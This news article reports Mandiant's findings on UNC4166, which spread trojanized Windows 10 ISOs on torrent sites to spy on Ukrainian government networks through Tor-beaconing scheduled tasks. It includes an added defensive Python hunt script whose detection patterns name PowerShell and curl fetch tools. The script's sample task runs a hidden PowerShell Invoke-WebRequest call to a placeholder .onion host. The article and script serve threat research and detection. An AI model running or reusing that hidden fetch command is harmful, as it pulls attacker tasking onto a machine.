Software supply chain attacks are not slowing down, and researchers have uncovered a new example that targeted victims in Ukraine with malicious Windows installer files that were designed to gather and exfiltrate sensitive data from compromised machines.
The campaign involved the threat actors hosting the malicious files on torrent sites in Russia and Ukraine. The files were disguised as legitimate installers for Windows 10. Researchers at Mandiant discovered the operation and attributed it to a new, previously unknown group that Mandiant tracks as UNC4166. Though the actors are not known, Mandiant said some of the victim organizations overlapped with ones that APT28 has targeted previously with destructive malware attacks. APT28, also known as Fancy Bear, is associated with Russia’s GRU military intelligence unit.
The operation appears to have been focused solely on information gathering, with no financial motivation, Mandiant said. In some of the compromised organizations, the UNC4166 actors installed backdoors to maintain persistence.
“The trojanized ISOs were hosted on Ukrainian and Russian language torrent file sharing sites. Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it. At a subset of victims, additional tools are deployed to enable further intelligence gathering. In some instances, we discovered additional payloads that were likely deployed following initial reconnaissance including the STOWAWAY, BEACON, and SPAREPART backdoors,” a Mandiant post on the operation says.
Software supply chain attacks have become a tool of choice for some top-tier threat groups, especially those in the intelligence community. Compromising one piece of software or library and having the results filter down through the supply chain can pay dividends for months or years to come. Mandiant said this specific operation began several months ago and one of the ISO files used in it was designed to disable security telemetry and also block automatic updates.
“The ISO contained malicious scheduled tasks that were altered and identified on multiple systems at three different Ukrainian organizations beaconing to .onion TOR domains beginning around mid-July 2022,” Mandiant said.
“Mandiant assesses that the threat actor performs initial triage of compromised devices, likely to determine whether the victims were of interest. This triage takes place using the trojanized scheduled tasks. In some cases, the threat actor may deploy additional capability for data theft or new persistence backdoors, likely for redundancy in the cases of SPAREPART or to enable additional tradecraft with BEACON and STOWAWAY.”
The researchers said that the operation was probably designed to gather information from Ukrainian government agencies.
“Mandiant identified several devices within Ukrainian Government networks which contained malicious scheduled tasks that communicated to a TOR website from around July 12th, 2022. These scheduled tasks act as a lightweight backdoor that retrieves tasking via HTTP requests to a given command and control (C2) server,” Mandiant said.
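The scheduled-task beacon described above suggests a simple defensive hunt: export task definitions (for example with `schtasks /Query /TN <name> /XML`) and flag any Exec action whose command line references a .onion host or pulls content over HTTP from a scripting host. The following is an added example written for this page, not Mandiant's code or tooling; the indicator patterns and the two task exports are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML exports (schtasks /Query /TN <name> /XML).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Hypothetical hunt indicators (assumptions, not from the report): a Tor
# hidden-service hostname, and a command line that fetches content over HTTP.
ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b", re.IGNORECASE)
FETCH_RE = re.compile(r"Invoke-WebRequest|WebClient|DownloadString|curl\.exe|bitsadmin",
                      re.IGNORECASE)


def suspicious_actions(task_xml: str) -> list:
    """Return (command, arguments, reasons) for every <Exec> action in an
    exported task whose command line looks like HTTP tasking or a Tor beacon."""
    root = ET.fromstring(task_xml)
    hits = []
    for exc in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (exc.findtext("t:Command", default="", namespaces=NS) or "").strip()
        args = (exc.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        line = f"{cmd} {args}"
        reasons = []
        if ONION_RE.search(line):
            reasons.append("onion-domain")
        if FETCH_RE.search(line):
            reasons.append("http-fetch")
        if reasons:
            hits.append((cmd, args, ",".join(reasons)))
    return hits


# Constructed sample exports for testing; not real task definitions from the campaign.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions><Exec><Command>cleanmgr.exe</Command>
  <Arguments>/autoclean</Arguments></Exec></Actions></Task>"""

SUSPECT_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions><Exec><Command>powershell.exe</Command>
  <Arguments>-w hidden -c "Invoke-WebRequest http://placeholderplaceholder.onion/t"</Arguments>
  </Exec></Actions></Task>"""

if __name__ == "__main__":
    for name, xml in (("benign", BENIGN_TASK), ("suspect", SUSPECT_TASK)):
        print(name, suspicious_actions(xml))
```

Run it over every exported task on a host and triage the hits; a legitimate task very rarely has any reason to contact a .onion address.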
“We believe that the operation was intended to target Ukrainian entities, due to the language pack used and the website used to distribute it. The use of trojanized ISOs is novel in espionage operations, and the included anti-detection capabilities indicate that the actors behind this activity are security conscious and patient, as the operation would have required significant time and resources to develop and wait for the ISO to be installed on a network of interest.”
In some cases, compromised devices had more than one backdoor on them, and the threat actors also tried to download and install the Tor browser on some machines.